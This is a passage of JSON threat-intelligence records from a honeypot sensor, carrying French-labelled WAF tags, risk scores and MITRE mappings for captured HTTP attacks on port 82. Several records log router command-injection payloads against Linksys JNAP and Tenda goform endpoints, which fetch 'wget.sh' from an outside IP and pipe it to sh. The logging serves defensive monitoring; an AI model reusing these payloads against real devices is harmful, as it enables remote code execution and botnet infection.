\u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022c3e7e6cc30df2d13f35da4ffab090bfe\u0022, \u0022path_pattern_hash\u0022: \u002209d793525e81db3cecc4e36c738b6310\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 79}, \u0022payload_preview\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jn\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jnap\/wpsstationinfo\/GetStationInfo\\r\\nContent-Length: 205\\r\\nConnection: close\\r\\n\\r\\ndevice_name=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/w\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jn\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/JNAP\/\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jnap\/wpsstationinfo\/GetStationInfo\\r\\nContent-Length: 205\\r\\nConnection: close\\r\\n\\r\\ndevice_name=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/w\u0022, \u0022payload_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jn\u0022, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022web_injection\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022359ea0d9d563b818b0ac2f7832bf6fd580c013cc\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jn\u0022, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 8 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Motif SSRF \u00b7 confiance 95%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 79\/100 (\u00c9lev\u00e9) \u2014 MITRE TA0001 \u2014 confiance 95 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 95, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 79}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 79, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022pat-0842\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022pat-0842\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/JNAP\/\u0022, \u0022request_line\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022http smuggling probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/JNAP\/\u0022, \u0022evidence_snippet\u0022: \u0022POST \/JNAP\/ HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nX-JNAP-ACTION: http:\/\/linksys.com\/jn\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 95 % \u2014 Motif catalogue confirm\u00e9 \u00b7 8 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 95 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950347:rce-5\u0022, \u0022950406:ssrf-3\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_ssrf_body\u0022]","anomalies":"[]","severity":10,"bytes_in":409},{"id":11809364,"ip":"45.153.34.219","ts":"2026-07-14 02:18:14.000000","proto":"tcp","src_port":55304,"dst_port":82,"service":"http","classification":"config_file_probe","waf_score":47,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 3, \u0022http_path_ext\u0022: \u0022js\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00222919e85805df844f358bfd44a8cd7d77ed0a470b\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 291, \u0022payload_entropy\u0022: 5.193263635525155, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u00225f747a0e580a9fefdbb051ad37385cd1108da754\u0022, \u0022event_fingerprint\u0022: \u0022a94ad7bba850e53a023feeb8ec12a3ecbb8e819e\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00226cebb999145248d35aa230e5f745ffd6\u0022, \u0022path_pattern_hash\u0022: \u002295596bbb7d1e66e7933797f3db9d43de\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022query_string\u0022: \u0022deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022query_string\u0022: \u0022deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda HTTP\/1.1\\r\\nHost: 6\u0022, \u0022payload_snippet\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022319d88aa8cf2dd663c1a92f635963f87747f2c1c\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022request_line\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022request_line\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_goform\u0022, \u0022http_sensitive_path\u0022], \u0022behavior_alert_count\u0022: 1, \u0022behavior_priority\u0022: 84}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_goform\u0022, \u0022http_sensitive_path\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":291},{"id":11809365,"ip":"45.153.34.219","ts":"2026-07-14 02:18:14.000000","proto":"tcp","src_port":55314,"dst_port":82,"service":"http","classification":"lfi_path_traversal","waf_score":53,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, 